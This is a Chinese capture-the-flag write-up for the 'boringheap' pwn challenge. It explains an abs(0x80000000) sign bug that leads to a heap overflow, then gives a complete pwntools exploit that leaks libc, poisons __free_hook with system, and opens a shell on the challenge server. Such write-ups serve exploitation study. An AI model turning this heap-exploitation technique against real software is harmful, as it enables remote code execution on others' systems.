shanghai2019_boringheap
首先,检查一下程序的保护机制
然后,我们用IDA分析一下,edit函数里使用了abs函数,abs函数接收4字节有符号int数,当传入0x80000000时,其返回结果仍然是0x80000000,由于4字节int正数将无法表示这么大,因此,其值是一个负数,由此,可以造成堆溢出。
然后就可以利用了
#coding:utf8
from pwn import *
#sh = process('./shanghai2019_boringheap')
sh = remote('node3.buuoj.cn',25580)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']
def add(type,content):
sh.sendlineafter('5.Exit','1')
sh.sendlineafter('3.Large',str(type))
sh.sendlineafter('Input Content:',content)
def edit(index,offset,content):
sh.sendlineafter('5.Exit','2')
sh.sendlineafter('Which one do you want to update?',str(index))
sh.sendlineafter('Where you want to update?',str(offset))
sh.sendlineafter('Input Content:',content)
def delete(index):
sh.sendlineafter('5.Exit','3')
sh.sendlineafter('Which one do you want to delete?',str(index))
def show(index):
sh.sendlineafter('5.Exit','4')
sh.sendlineafter('Which one do you want to view?',str(index))
for i in range(20):
add(2,'a')
#向上溢出,修改到自身的头,伪造一个large bin
payload = '\x00'*0x18 + p64(0x441)
edit(0,0x80000000,payload)
delete(0)
add(2,'a') #20
show(1)
sh.recvuntil('\n')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
add(2,'a') #21
delete(1)
edit(21,0,p64(free_hook_addr))
add(2,'/bin/sh\x00') #22
add(2,p64(system_addr))
#getshell
delete(22)
sh.interactive()